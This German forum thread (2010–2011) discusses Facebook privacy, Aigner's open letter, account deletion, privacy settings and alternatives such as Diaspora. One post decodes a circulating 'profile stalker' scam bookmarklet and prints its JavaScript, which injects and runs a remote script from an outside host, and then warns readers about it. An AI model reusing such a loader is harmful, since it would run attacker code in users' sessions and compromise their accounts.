eXma » Diskutieren » Weltgeschehen
Startseite - Veranstaltungen - Mitglieder - Suche
Vollständige Version anzeigen: Das Facebook-Desaster
Seiten: 1, 2
Fuchs
Erst der Heckmeck mit'm VZ und nun verwandelt sich Facebook in den Teufel. Abgesehen von der Datenspeicherei und lockern die den Datenschutz nun seit geraumer Zeit immer mehr; Daten sollen mittlerweile automatisiert an Dritte weitergegeben werden. Frau Aigner äußerte sich darüber bereits*, am besten treten wir alle aus. Um dem "Selbst-schuld"-Zeige-Finger-heb-Blabla mal einhalt zu gebieten: Mein Facebook-Profil habe ich lediglich zur Kommunikation mit meinen Freunden im Ausland erstellt. Es ist die praktikabelste Möglichkeit mit ihnen in Kontakt zu bleiben, deswegen möchte ich mein Profil ungern löschen (mal davon abgesehen das meine - größtenteils natürlich falschen - Daten sowieso auf immer und ewig gespeichert und wohl auch verwendet werden).

Was denkt ihr? Wie geht ihr damit um und denkt ihr, Aigners offener Brief ist ein Schritt in die richtige Richtung?
sn3ek
Zitat(Fuchs @ 06 Apr 2010, 12:52)
[...] (mal davon abgesehen das meine - größtenteils natürlich falschen - Daten sowieso auf immer und ewig gespeichert und wohl auch verwendet werden).
*



Abgesehen davon gibt es in Facebook keine "Löschen Funktion". Das nennt sich in Facebook "deaktivieren" und speichert die Daten weiterhin in der Datenbank. Will man nämlich wieder beitreten bietet Facebook die "bequeme" Möglichkeit an, dass man ja seine Daten wieder reaktivieren kann.

Aber mal meine Meinung dazu:

Das was Facebook da an dritte weiterleitet wird nun offiziell gemacht, was vorher "illegal" war. Wer glaubt seine Daten sind erst jetzt bei den Dritten angelangt, der täuscht. Facebook hat in der Vergangenheit immer mal wieder mini-Ausfälle/ Bugs gehabt, die es ermöglichten für gewisse kurze Zeit z.B. Fotos ALLEN verfügbar zu machen, was erst vor einigen Wochen wieder war. 30 Minuten reichen für einen Google Grawler aus, um die Fotos zu indizieren. Also diese Daten werden immer und ewig auf einem der 450.000 Server von Google gespeichert und verfügbar sein. (ob alle, ist dahingestellt, aber viele wird es sicherlich erwisht haben).

Klar hat Facebook ein starkes Datenschutzleck, aber die Leute sind selbst schuld, was da angegeben wird. Man muss ja nicht seinen gesamten Lebenslauf in FB oder SVZ angeben. Wer es macht, der darf sich am Ende aber nicht beschweren. Wenn nun alle bei Facebook austreten, gibt es wieder eine "wir sind nicht böse"- Community wo die Leute wieder anfangen ihren daten preis zu geben und dann sind wir wieder im Facebook Disaster angelangt. Das ist ein Teufelskreis der sich nie mehr schließen wird. Menschen müssen auf sich selbst aufpassen. Eine "Aufklärungsaktion" hilft in diesem Fall viel besser als eine "Wir pochen auf Datenschutz"...
abadd0n
Frau Aigner macht ihren Job gut, allerdings ist diese Facebook-Aktion nicht viel mehr wert als ein Ablenkungsmanöver. Damit Herr de Maizière in Ruhe die staatlichen Bestrebungen (ELENA, ACTA, Steuer-Nr., ZugErschwG etc.) durchsetzen kann wird nebenbei mit dem Vorhaben "Datenbrief" ein wenig Staub aufgewirbelt und mit dem bösen Zeigefinger (hier oder hier) auf Unternehmen gezeigt - vielleicht auch zum Teil, weil man neidisch ist, dass die freie Wirtschaft es einfach mal besser auf die Reihe bekommt, die breite Masse zu durchleuchten als man selbst. Irgendwie ist das für die bildungs- und forschungspolitische Sprecherin der CDU/CSU-Bundestagsfraktion, die sich sonst um die Belange bayrischer Bauern kümmert zuuuu auffällig "gutmenschlich".

Aigner unterstützt zwar die Idee des Datenbriefs, aber ich will nicht wissen, was daraus vom Gesetzgeber gemacht wird: Das mindeste wird wohl sein, dass man aus Opt-In ein Opt-Out macht - womit wir nicht wirklich voran gekommen wären.

Zu Facebook gibt es nicht viel zu sagen.

Abd.
Fuchs
Zitat(sn3ek @ 06 Apr 2010, 13:04)
Wenn nun alle bei Facebook austreten, gibt es wieder eine "wir sind nicht böse"- Community wo die Leute wieder anfangen ihren daten preis zu geben und dann sind wir wieder im Facebook Disaster angelangt. Das ist ein Teufelskreis der sich nie mehr schließen wird. Menschen müssen auf sich selbst aufpassen. Eine "Aufklärungsaktion" hilft in diesem Fall viel besser als eine "Wir pochen auf Datenschutz"...
*



ok, dem oberen teil deines posts wollte ich bereits mit meinem eröffnungspost vorbeugen. hat offensichtlich nicht geklappt.

Ansonsten: ich nehme auch an, dass dann eine neue Community kommen wird. Communitys sind ja auch nicht schlimm. Meine Frage ist eher: Wie soll man nun am besten reagieren? Ich verliere ja wie gesagt, keine Selbstdarstellungs- sondern eine mir wichtige Kommunikationsplattform... Es geht auch nicht um meine Daten (die sind wie gesagt nich echt), sondern um ein allgemeines, auch solidarisches Umgehen mit der Situation...
abadd0n
Zitat(Fuchs @ 06 Apr 2010, 13:19)
Meine Frage ist eher: Wie soll man nun am besten reagieren?
*

Lege Dir einen echten Premium-Account bei openBC an.

Abd.
Fuchs
und was bringt mir das????
lusch3
Zitat(sn3ek @ 06 Apr 2010, 13:04)
Abgesehen davon gibt es in Facebook keine "Löschen Funktion". Das nennt sich in Facebook "deaktivieren" und speichert die Daten weiterhin in der Datenbank. Will man nämlich wieder beitreten bietet Facebook die "bequeme" Möglichkeit an, dass man ja seine Daten wieder reaktivieren kann.
*



https://ssl.facebook.com/help/contact.php?s...=delete_account
bunglefever
Vorsichtiger. Und zwar nicht nur im Zusammenhang mit Facebook, sondern mit sämtlichen Daten, die man im Internet preisgibt. Firmen, die für derartige Daten Geld bezahlen, benötigen Realdaten, also i.d.R. Adressen, Realnamen, bla. Wenn ich die im Internet nicht preisgebe, kann sie auch keiner kaufen. Und mit meinen Nicknames und Spamsammeladressen könnense gern machen was sie wollen

Btw. möchte ich an dieser Stelle die Aussage von abd unterstreichen. Das Ablenkungsmanöver, mit dem Frau Aigner versucht, der Wirtschaft den schwarzen Peter zuzuschieben, ist ja schön lächerlich offensichtlich. Eine Woche, nachdem eine Sammelklage gegen das staatliche Datensammelgroßprojekt ELENA eingegangen ist, wird schnell der Spot woanders hingerichtet. Das ist lächerlich
sn3ek
Zitat(Fuchs @ 06 Apr 2010, 13:19)
ok, dem oberen teil deines posts wollte ich bereits mit meinem eröffnungspost vorbeugen. hat offensichtlich nicht geklappt.

Ansonsten: ich nehme auch an, dass dann eine neue Community kommen wird. Communitys sind ja auch nicht schlimm. Meine Frage ist eher: Wie soll man nun am besten reagieren? Ich verliere ja wie gesagt, keine Selbstdarstellungs- sondern eine mir wichtige Kommunikationsplattform... Es geht auch nicht um meine Daten (die sind wie gesagt nich echt), sondern um ein allgemeines, auch solidarisches Umgehen mit der Situation...
*



Die Möglichkeit besteht ja noch seine Bekanntschaften zu ICQ, Skype, MSN, Yahoo, GoogleTalk, Jabber, ... einzuladen und dort mit denen zu kommunizieren oder die gute alte Email zu nutzen wink.gif

Oder man baut sich seine eigene "Freundes-Verwaltungs"-Webseite. Aber ob FB oder SVZ, oder Orkut etc. die Communities werden immer ein Datenschutzleck haben, da kann man hingehen wo man will. Das was man über das jabber oder icq Protokoll preis gibt, sind mitunter sogar noch sensiblere Daten als unter Facebook, und da sagt niemand was. Die ICQ-Chat-Historie wird zwar nicht offensichtlich auf dem Server, sondern lokal gespeichert, aber diese passieren auch X Server und sollte man dort nicht auch vorsichtiger sein? cool.gif
Fuchs
Zitat(sn3ek @ 06 Apr 2010, 13:28)
Die Möglichkeit besteht ja noch seine Bekanntschaften zu ICQ, Skype, MSN, Yahoo, GoogleTalk, Jabber, ... einzuladen und dort mit denen zu kommunizieren oder die gute alte Email zu nutzen wink.gif
*



Die Messaging-Variante ist insofern ein Problem, als das in verschiedenen Ländern verschieden IMs common sind - man also nicht alle auf einem haufen hat. mäh e-mail... aber in letzter konsequenz...

@ Aigner: klar so isses doch immer...
bunglefever
Zitat(Fuchs @ 06 Apr 2010, 13:32)
Die Messaging-Variante ist insofern ein Problem, als das in verschiedenen Ländern verschieden IMs common sind - man also nicht alle auf einem haufen hat. mäh e-mail... aber in letzter konsequenz...


Multimessenger (Erster biggrin.gif)

Ich hab die Erfahrung gemacht, dass in vielen Längern Messenger generell nicht common sind.
Perseus
Zitat(sn3ek @ 06 Apr 2010, 13:28)
Das was man über das jabber oder icq Protokoll preis gibt, sind mitunter sogar noch sensiblere Daten als unter Facebook, und da sagt niemand was. Die ICQ-Chat-Historie wird zwar nicht offensichtlich auf dem Server, sondern lokal gespeichert, aber diese passieren auch X Server und sollte man dort nicht auch vorsichtiger sein?  cool.gif
*



Zitat(ICQ Nutzungsregeln)
You agree that by posting any material or information anywhere on the ICQ Services and Information you surrender your copyright and any other proprietary right in the posted material or information. You further agree that ICQ Inc. is entitled to use at its own discretion any of the posted material or information in any manner it deems fit, including, but not limited to, publishing the material or distributing it.


OTR hilft.
sn3ek
Zitat(Perseus @ 06 Apr 2010, 13:36)
Zitat(ICQ Nutzungsregeln)
You agree that by posting any material or information anywhere on the ICQ Services and Information you surrender your copyright and any other proprietary right in the posted material or information. You further agree that ICQ Inc. is entitled to use at its own discretion any of the posted material or information in any manner it deems fit, including, but not limited to, publishing the material or distributing it.


OTR hilft.
*



Aber das OTR hat das Problem, es muss auf jedem Rechner erst installiert werden und damit kommen einige Normal-User nicht klar...
Perseus
Zitat(sn3ek @ 06 Apr 2010, 13:39)
Aber das OTR hat das Problem, es muss auf jedem Rechner erst installiert werden und damit kommen einige Normal-User nicht klar...
*



ICQ muss ich auch erst installieren... rolleyes.gif
sn3ek
Zitat(Perseus @ 06 Apr 2010, 13:44)
ICQ muss ich auch erst installieren...  rolleyes.gif
*



Ich meine damit eher: OTR nützt ja nur was, wenn es auf beiden Seiten genutzt wird, sonst kannst du es auch vergessen...
Perseus
Zitat(sn3ek @ 06 Apr 2010, 13:45)
Ich meine damit eher: OTR nützt ja nur was, wenn es auf beiden Seiten genutzt wird, sonst kannst du es auch vergessen...
*



Und was ist das fürn Argument? Wenn nur ich ICQ hab, kann ich versuchen, meinen Freund darüber zu kontaktieren, so oft ich will - es geht auch nicht, wenn er kein ICQ hat.
Fuchs
das ist offtopic yeahrite.gif

auch: Chat!
Perseus
Zitat(Fuchs @ 06 Apr 2010, 13:58)
das ist offtopic  yeahrite.gif

auch: Chat!
*



ja klar, was über IRC server geht, ist ja auch so sicher...
SCNR tongue3.gif


B2T:
In sämtlichen Communities steht öffentlich von mir nur das, was ich auch jedem bei nem Bier in ner Bar erzählen würde. Seelenstriptease gibbet nicht, und auch wer mein "Freund" ist, kriegt nicht alles zu sehn, einfach weil ich nicht alles angegegeben hab..
Fuchs
ja, können wa das jetzt bitte abhaken?

Es geht um's kollektive austreten, Mensch. Soziale Verantwortung und so...
abadd0n
Better go to Account > Privacy Settings > Applications and Websites > and UNCHECK "Instant Personalization".

Es wird immer lustiger werden.

+Abd
Aristoteles
Na Gott sei Dank bin ich raus dort...kann man irgendwie noch checken ob meine Daten von dort noch irgendwo rumschwirren?
Polygon
Zitat(Aristoteles @ 23 Apr 2010, 07:18)
Na Gott sei Dank bin ich raus dort...kann man irgendwie noch checken ob meine Daten von dort noch irgendwo rumschwirren?
*



Nein, du kannst dich aber drauf verlassen
simpson
Zitat(abadd0n @ 23 Apr 2010, 05:17)
Better go to Account > Privacy Settings > Applications and Websites > and UNCHECK "Instant Personalization".

Es wird immer lustiger werden.

+Abd
*



bei mir unangehakt. und ich kann mich nicht erinnern, da was geändert zu haben (und ich hab viel geändert). also evtl standardmäßig aus?
lusch3
wird "nur" bei neuangelegten Accounts standardmäßig aktiviert sein.
erich
ich persönlich hab nie verstanden, warum de leude bei myspace noch anti-datenschützerüsch schnuffige nicknames verwendet haben und bei facebook plötzlich, als sei es was biblisches, schön den vor und zunamen samt schuhgröße und körbchengröße verwenden, zumal der fetzbookhype erst nach den ersten großen internet&privatssphärendebatten einsetzte.

jaja, hinterher besser wissen ... blabla... smile.gif
vorher denken. biggrin.gif

ansonsten gas geben. löschen. vernichten. nickname acc wenn mans haben will. trunkenheitsbilder weglassen.
iggi
Aber wer kümmert sich um meine Farm wenn ich austrete? blink.gif
DonutPanic
Jetzt hat sich auch South Park dazu ausgelassen: You have 0 friends

"Stan, poke your grandma!" lol.gif

Mr_T
Suchmaschine für Facebook (nee, account braucht man nicht). Hauptsächlich der Status wird durchsucht.

http://youropenbook.org/

http://www.booshaka.com/
abadd0n
Facebook hat es nun auch auf die Titelseite des aktuellen Time Magazine (Artikel) geschafft... woran auch Entwicklungen wie Open Graph (Original) nicht ganz unschuldig sein dürften.

Das ARD-Magazin "Monitor" (20.5.) hat wie immer gutes Gespür für Zeitgeist, - dazu ein Beitrag bei netzpolitik.org.

Zur Erheiterung eine Zeile, die ich jüngst bei einem Bekannten auf dessen Pinnwand las:
Zitat
was passiert eigentlich, wenn man auf dem Profil seiner Freundin ist und auf "share" klickt ...?


#ababuu
chelys
Ist es fahrlässig, wenn ich als informatikaffiner Mensch die ganze Paranoia übertrieben finde? Wenn man für Facebook & Co. keine reellen Namen bzw. persönliche Daten angibt und hier auch eine extra Emailadresse verwendet, sehe ich da absolut kein Problem! Anstatt die ganze Zeit auf den Plattformen rumzuhacken sollte man die Leute lieber aufklären, damit sie sich wie mündige Internetnutzer aufführen.

Facebook-Disaster! 2012! Klimaerwärmung! Überalterung der Gesellschaft! Der Euro stirbt! H5N1! Google hat meine Daten und schickt mir personalisierte Werbebanner! Wahhh!
loco
die namen bei facebook werden ja jetzt 'überprüft', wenn man sie ändert oder neu anlegt..
unicum
bild kann nicht angezeigt werden
bunglefever
Zitat(chelys @ 21 May 2010, 14:21)
Ist es fahrlässig, wenn ich als informatikaffiner Mensch die ganze Paranoia übertrieben finde? Wenn man für Facebook & Co. keine reellen Namen bzw. persönliche Daten angibt und hier auch eine extra Emailadresse verwendet, sehe ich da absolut kein Problem! Anstatt die ganze Zeit auf den Plattformen rumzuhacken sollte man die Leute lieber aufklären, damit sie sich wie mündige Internetnutzer aufführen.
*



Word!
avu
Ich sehe bei Facebook garkeinen großen Unterschied zu Twitter, Blogs, Forenpostings usw.

Daten die man da "einstellt" sind öffentlich. Und damit meine ich wirklich ALLE Daten, auch die die man als "dürfen nur meine Freunde sehen" markiert usw. Also muss man eben genau wie bei Dingen die man an die eigene Haustür schreibt oder auf einem T-Shirt mit sich rumträgt darüber im klaren sein, was genau man der allgemeinen Öffentlichkeit da mitteilt und was nicht.

Dass das der Allgemeinheit erst jetzt nach und nach klar wird hat in meinen Augen nichts mit einer Veränderung der Sachlage zu tun sondern einfach mit einem stetigen lernprozess. Anfangs stürzten sich alle vertrauensvoll auf die neuen Spielzeuge im Internet, nun werden nach und nach doch mal die Hirne eingeschaltet.

Fazit: Business as usual, move along. :-)
simpson
die namensüberprüfung ist aber..ääh..durchlässig wink.gif
chelys
Wenn ich mich so im "Freundeskreis" umsehe... jepp lol.gif

P.S. werden die Daten der exmauser eigentlich verkauft? Wäre doch eine Überlegung wert
iggi
Ich finds drollig, dass die Leute im VZ ihre Namen ändern, obwohl da der google-bot eigentlich nicht rein kommt, aber im "offenen" Facebook mit vollem Namen fröhlich ihr Privatleben ausbreiten.
chelys
Zitat(iggi @ 21 May 2010, 15:11)
Ich finds drollig, dass die Leute im VZ ihre Namen ändern, obwohl da der google-bot eigentlich nicht rein kommt, aber im "offenen" Facebook mit vollem Namen fröhlich ihr Privatleben ausbreiten.
*



Das ist mir auch schon aufgefallen. Womöglich scheint die Wahrnehmung diesbezüglich bei vielen Leuten fast nur durch die Medien beeinflusst zu werden. Die haben sich alle umbenannt, als das StudiVZ datenschutztechnisch in Verruf geraten ist. Auf Facebook scheint man das nicht übertragen zu haben lol.gif
Chris
Ich nenne es weiterhin den Privatsphäre-Öffentlichkeit-Dualismus des Internets.
abadd0n
Zitat(chelys @ 21 May 2010, 15:00)
P.S. werden die Daten der exmauser eigentlich verkauft? Wäre doch eine Überlegung wert
*

Ja, wir verhandeln derzeit mit VSR-Verlagsservice und Blackhawk in Vertretung der BILD, sind uns aber noch nicht ganz sicher, wo mehr Profit herausgeschlagen wird.

abaddon, *scnr

Disclaimer für Ironieresistente: NEIN! P.S.: Eigentlich würde ich chelys ja gern einen Warnpunkt wegen Moralzersetzung geben *g
loco
Zitat(simpson @ 21 May 2010, 14:42)
die namensüberprüfung ist aber..ääh..durchlässig wink.gif

ja das definitiv, nur weiß ich eben nicht wie weit.. ich kann mir auch nicht wirklich vorstellen, dass die leute abstellen, die das persönlich prüfen.. woher soll zb ein ami wissen wie ein chinesischer name 'richtig' ist

ich denke mal das schema "wortX wortY" ohne sonderzeichen usw. kommt immer durch
abadd0n
"Das Beste, was Facebook passieren könnte, wäre, seine Daten zu öffnen", sagte Google-Chef Eric Schmidt bei der Google-Zeitgeist-Tagung im US-amerikanischen Scottsdale. Schmidt hofft offenbar, dass sein Unternehmen mit Facebook zusammenarbeiten kann, um mehr Elemente aus sozialen Netzwerken in seinem eigenen Angebot anbieten zu können. [ weiterlesen... ]

#a
lovehina
den interessanten absatz hätteste jka nu noch mit zitieren können:
"Falls eine Kooperation scheitere, "gibt es andere Wege, um an diese Informationen zu kommen", sagte Schmidt laut einem Artikel des Wall Street Journals, ohne Details zu nennen. "
bsf
Weiß jemand was genaues zu Diaspora?
Wie ist die Meinung hier dazu?
Meint ihr, das hat eine Chance als neues Netzwerk?
wombat1st
potential hat es, aber das wird sich erst ab oktober wirklich zeigen.
abadd0n
New feature:

When I download my information from Facebook, what is included in the file?

Your file will include the following information:

* Your profile information (e.g., your contact information, interests, groups)
* Wall posts and content that you and your friends have posted to your profile
* Photos and videos that you have uploaded to your account
* Your friend list
* Notes you have created
* Events to which you have RSVP’d
* Your sent and received messages
* Any comments that you and your friends have made on your Wall posts, photos,
and other profile content


"A life on facebook"

#a

/€: neue Video-URL wg. Urhebergedöhns
bsf
Hat jemand 'ne Einladung für Diaspora?
Polygon
Zitat(bsf @ 26 Nov 2010, 16:01)
Hat jemand 'ne Einladung für Diaspora?
*



Da hab ichn schönes Zitat zu:

"Uh, now I've got accounts on a couple of broken #diaspora installations. Please friend them all!"
onkelroman
[attachmentid=34484]

das kam grad.. klick ich drauf, erscheint die login-aufforderung, obwohl ich angemeldet bin. phishing?

/edit: kuck.
Fuchs
Zitat(bsf @ 26 Nov 2010, 16:01)
Hat jemand 'ne Einladung für Diaspora?
*



ich hab eine!
Silenzium
Dass man über einen JavaScript-Code (siehe fbstalkeronline.info) herausfinden kann, wer das eigene Profil am meisten besucht, macht gerade über diverse Kurzlinks die Runde. Ich habe es nicht ausprobiert, weil ich dem Ganzen nicht so recht traue. Aber hat jemand Ahnung von JS und kann mal sagen, was dieser kleine Code eigentlich macht?
iqaluit
Sind die Kurzlinks nicht generell Spam/Malware/wasauchimmer?
onkelroman
er schreibt zumindest, dass nach dem posten des codes dieses* skript ausgeführt wird, welches unter anderm automatisch einen status ("Wow! Seems like lots of people stalk me...") in dein profil postet..

das wichtige daran: eine möglichkeit, seine besucher herauszufinden, bietet auch dieses tool nicht..


*keine sorge, nur pastebin
anatoL
hex-entities in klartext übersetzen ->

'javascript: var _0x2473=["src","script","createElement","http://fbstalkeronline.info/m/creeps.js?one","appendChild","body& quot;];(a=(b=document)[_0x2473[2]](_0x2473[1]))[_0x2473[0]]=_0x2473[3];b[_0
x2473[5]][_0x2473[4]](a); void (0);'



wenn man jetzt noch n bisschen deobfuscation betreibt, sieht man, dass das Ding im prinzip ein document.createElement('script') macht, also einen Javascript-knoten in die aktuelle Seite reinpackt und diesen dann auch netterweise gleich ausführt. Und zwar konkret das JS von http://fbstalkeronline.info/m/creeps.js?one
anatoL
Generell: noscript ist eine absolut essentielle Firefox-extension (gibts in ähnlicher Form auch für chrome). Damit kann man selektiv einigen Sites Javascript erlauben (facebook, sites mit video playern drin, evtl google), und der Rest guckt in die Röhre.
abadd0n
Schon seit Mitte letzten Jahres hat Facebook die Gesichtserkennung begonnen zu implementieren. Diese ist jetzt "scharf" geschaltet, d.h. für jeden Nutzer automatisch verfügbar.

Die Bildererkennung lässt sich wie folgt deaktivieren: In der rechten oberen Ecke auf "Konto" klicken -> Privatsphäre-Einstellungen -> Benutzerdefinierte Einstellungen -> Freunden Fotos von mir vorschlagen.

#abd
chelys
Danke für den Hinweis, ist mir gar nicht aufgefallen. Ich finde es schon ziemlich mies, dass solche Funktionen standardmäßig aktiviert sind. Muss ich jetzt jeden Tag in die Privatsphäreeinstellungen schauen?
onkelroman
oha: anonymous will facebook am 5. november lahmlegen.

mal sehen.
chelys
Zitat(onkelroman @ 09 Aug 2011, 19:52)
oha: anonymous will facebook am 5. november lahmlegen.

mal sehen.
*



die spinnen doch... haufen
onkelroman
lesenswert.
Chris
Die Idee ist gut, sie gibt maximale Freiheit. Ich versteh nur nicht, warum die sich bekriegen. Klar, man hat widersprüchliche Meinungen, aber es kann doch jeder selbst entscheiden, an welcher Aktion er teilnimmt. Und dadurch nimmt man dem anderen doch auch nichts weg. Irgendwie offenbart sich da die Natur des Menschens ziemlich krass.
onkelroman
anons neues social network "anonplus.com" scheint btw ebenfalls grad gehackt worden zu sein. lol.gif

/edit: jetzt gibts dort einen anderen inhalt, irgendwas komisches von semitanet.com.. vor 20 sekunden war da noch ein großes bild mit ein paar mumifizierten leichen und eine überschrift mit "sYrIaN hAcK3Rs" zu sehen..

/edit2: und jetzt isses wieder die anonplus.com-startseite. verrückt ^^
Achi
weiß einer, was MeinKalender ist? es scheint, als wenn die hälte meiner facebookbekanntschaft das nutzet und jeder mich dazu einladen will. ...aber dafür muss ich die sichere verbindung kappen und anschließend folgendes akzeptieren:
Zitat
Auf meine allgemeinen Daten zugreifen
Dazu zählen Name, Profilbild, Geschlecht, Netzwerke, Nutzerkennnummer, Freundesliste und alle anderen Informationen, die ich mit „Allen“ teile.
find ich ein wenig viel für ne einfache kalender-app ... oder ist das normla bei fb-apps und ich bin verwirrt, weil ich noch nie eine genutzt hab'?
mcnesium
oben rechts auf das X - "ignore all by MyCalendar App"
ck
Zitat(chelys @ 11 Aug 2011, 14:49)

rofl.gif Die Idee ist gut, aber sehr zeitraubend. Ich schaffe es ja kaum, ein auch nur halbwegs agiles fake-Profil aufzubauen (ein echtes Profil gebe ich nicht in deren Hände-man muss ja nicht (zu) paranoid sein, aber auch nicht zu leichtsinnig).
Polygon
Mr. Zuckerberg und seine Allmachtsfantasien. Er will eigentlich nichts anderes als jedes Detail eures Lebens. Mir fällt da nix mehr zu ein...

http://www.spiegel.de/netzwelt/web/0,1518,787927,00.html
Juri
​​
mcnesium
Zitat(Polygon @ 23 Sep 2011, 07:19)
Mir fällt da nix mehr zu ein...

einfach nicht jeden scheiß mitmachen?bild kann nicht angezeigt werden
Socres
Ich frag mich echt immer, wer zwingt euch dazu Facebook zu benutzen? (oder irgendwelche anderen Plattformen)
aeon
Zitat(Socres @ 23 Sep 2011, 11:22)
Ich frag mich echt immer, wer zwingt euch dazu Facebook zu benutzen? (oder irgendwelche anderen Plattformen)
*



großes rofl....
zausel
Zitat(aeon @ 23 Sep 2011, 12:54)
großes rofl....
*


was gibts da zu "rofl"n du facebookopfer wink.gif
Juri
​​
Schlummerpieps
worthy.gif ALL HAIL GOOGLE!
Socres
das hat och nüscht mit google oder studivz oder exma zu tun.
es bietet jemand ein produkt an. dieses produkt hat bestimmte eigenschaften. wenn jemandem diese eigenschaften nicht passen ist er (oder sie) doch nicht gezwungen dieses produkt zu erwerben/benutzen...

erklärt mir bitte wo das problem liegt.
Fuchs
ich glaube nicht, dass das so einfach ist. facebook hat 800 millionen nutzer und ist mittlerweile bestandteil des sozialen lebens, soll heißen real life und digital life sind miteinander untrennbar verschmolzen (bezeichnende beispiele waren hier ja in der letzten zeit gut zu beobachten) - und das nicht erst seit gestern. so wird facebook beispielsweise auch als informationsplattform, als medium, in der unternehmenkommunikation etc. unabdingbar. alles läuft mittlerweile über facebook: werbung, berufliches networking, natürlich der ganze PR-kram. einfach nicht mitmachen ist meist nicht so einfach.
wombat1st
bild kann nicht angezeigt werden

hmmm huh.gif
Socres
Du kannst aber niemandem vorschreiben wie er sein produkt zu gestalten hat. basta. dann muss man im schlimmsten fall halt auf seine soziale interaktion verzichten :P

funktioniert im fall facebook btw gut, eigentlich braucht man es wirklich nicht.
Fuchs
dann weiß entweder ich nicht, worauf du hinaus willst oder du nicht, worauf ich hinaus will...
zausel
Ich komm wunderbar ohne FB aus, es ohne mich und es ist ganz leicht. Sollte es irgendwann mal soweit kommen, dass es "Türen öffnet", werde ich wohl draußen bleiben müssen und alleine spielen. Spätestens dann hat das Internet aber eh nichts mehr zu bieten. Die 800 Millionen Nutzer und der Wert von Fantastrilliarden Dollar ist sowieso mit Vorsicht zu genießen.
Stormi
Ich habe - zugegebener Maßen eher aus Faulheit - ebenfalls keinen FB-Account und es ist überraschend egal. Es geht tatsächlich ohne. Wir müssen ja nu nicht jeden Dreck, der vom Westen kommt, kopieren jejeje.
Fuchs
also für mich ist es aus beruflichen gründen ziemlich nötig. genauso wie xing (wäääh xing)...
wombat1st
o,ö das habe ich ja noch nie gehört. warum ist facebook denn aus beruflichen gründen wichtig?
Fuchs
naja facebook ist ein medium und ich mach was mit medien^^ - wie gesagt auch PR-kram per facebook, virales marketing, netzwerken mit kunden und so n kram. zum kotzen...
wombat1st
aber dein privater account ist doch für deinen job nicht nötig?!
Stormi
Dies! Ich habe auch ein berufliches Xing-Profil und bin sonstwo angemeldet, aber da gibts dann eben keine Sauffotos von mir und keine Meldungen wann ich mit wem warum schluss gemacht habe.

Problematisch dabei ist, dass man auf FB schnell mal "irgendwo" verlinkt werden kann, sofern man das nicht explizit in den Einstellungen ausschaltet. Evtl. sollte man da ein Bewusstsein in den Firmen schaffen, dass diese die Mitarbeiter entweder nicht mit Klarnamen rumlaufen lassen oder (noch besser) Facebook entsprechende Firmenaccounts einrichtet, die dann nicht mit privatem Stuff verbunden werden können.
I.I
Zitat(Fuchs @ 23 Sep 2011, 13:12)
ich glaube nicht, dass das so einfach ist. facebook hat 800 millionen nutzer und ist mittlerweile bestandteil des sozialen lebens, soll heißen real life und digital life sind miteinander untrennbar verschmolzen (bezeichnende beispiele waren hier ja in der letzten zeit gut zu beobachten) - und das nicht erst seit gestern. so wird facebook beispielsweise auch als informationsplattform, als medium, in der unternehmenkommunikation etc. unabdingbar. alles läuft mittlerweile über facebook: werbung, berufliches networking, natürlich der ganze PR-kram. einfach nicht mitmachen ist meist nicht so einfach.
*



Das war ja mal ganz großer Bullshit! Nicht mitmachen ist sowas von einfach.

Hier der Plan:

1.) ausloggen
2.) nie mehr einloggen ... fertig.


oder wahlweise gar nicht erst anmelden.


Es kann natürlich sein, das eine charakterschwache Person, die sich nur über ihre sozialen Kontakte definiert, es schwer hat, den zweiten Punkt durchzuziehen.
Stormi
Schlechter Troll ist schlecht. Bitte nicht ganz so offensichtlich. So blöde kann doch keiner sein eh shifty.gif
Fuchs
Zitat(wombat1st @ 23 Sep 2011, 14:40)
aber dein privater account ist doch für deinen job nicht nötig?!
*



na gott sei dank nicht! viele accs for the win!

Zitat(Stormi @ 23 Sep 2011, 14:44)
Problematisch dabei ist, dass man auf FB schnell mal "irgendwo" verlinkt werden kann, sofern man das nicht explizit in den Einstellungen ausschaltet. Evtl. sollte man da ein Bewusstsein in den Firmen schaffen, dass diese die Mitarbeiter entweder nicht mit Klarnamen rumlaufen lassen oder (noch besser) Facebook entsprechende Firmenaccounts einrichtet, die dann nicht mit privatem Stuff verbunden werden können.
*



jo, auf jeden fall. v.a. in der jugendkommunikation^^
bunglefever
Zum Vergrößern klicken:
Zum Vergrößern klicken
Link zum Bild in voller Größe
franzman21
bin ich zu doof, oder geht das nicht:
ich will ausstellen, dass leute mich in fotos ohne meine zustimmung taggen können.
bin der meinung diesen punkt in den privacy-einstellungen gefunden zu haben, aber es funktioniert nicht...
thx
DonutPanic
Zitat(franzman21 @ 28 Sep 2011, 15:29)
bin ich zu doof, oder geht das nicht:
ich will ausstellen, dass leute mich in fotos ohne meine zustimmung taggen können.
bin der meinung diesen punkt in den privacy-einstellungen gefunden zu haben, aber es funktioniert nicht...
thx
*



Privatsphäre-Einstellungen -> Funktionsweise von Markierungen -> Markierungen überprüfen -> aktivieren

...würde ich jetzt mal sagen...
franzman21
ja aber ich werd trotzdem ohne zu fragen getaggt. können freunde einen immer taggen?
Maze
Hehe. Ich hab mal irgendwie vernommen, dass die Einstellungsoption so lautet, dass die Verlinkung nicht angezeigt wird für andere. Das heißt aber nicht, dass andere keine Verlinkung erstellen dürfen. Facebook kennt somit dein Gesicht, ob du willst oder nicht, wenn es so ist. yeahrite.gif

Da fällt mir nur noch eins ein. Scheiße gelaufen. rolleyes.gif
chelys
Zitat(Maze @ 29 Sep 2011, 19:07)
Facebook kennt somit dein Gesicht, ob du willst oder nicht, wenn es so ist.  yeahrite.gif


Nunja, wenn man mal ein Bild von sich als Profilbild hatte, weiß Gesichtsbuch sowieso bescheid sad.gif
Silenzium
Nutzt irgendwer Diaspora* und hat eine Empfehlung für einen Pod?
Giovanni

hochinteressant:
http://allfacebook.de/zahlen_fakten/facebook-university
abadd0n
Zitat(Silenzium @ 19 Oct 2011, 12:32)
Nutzt irgendwer Diaspora* und hat eine Empfehlung für einen Pod?
*

Ich, kann pod.geraspora.de empfehlen. smile.gif

#a
loco
Zitat(franzman21 @ 28 Sep 2011, 15:29)
bin ich zu doof, oder geht das nicht:
ich will ausstellen, dass leute mich in fotos ohne meine zustimmung taggen können.
bin der meinung diesen punkt in den privacy-einstellungen gefunden zu haben, aber es funktioniert nicht...
thx

nein, das geht nicht..
ich dachte auch erst, fb hätte es endlich mal gebacken bekommen, dass man erst ne freigabe der tags einholen muss - pustekuchen
franzman21
zum Thema Diaspora: Mitbegründer tot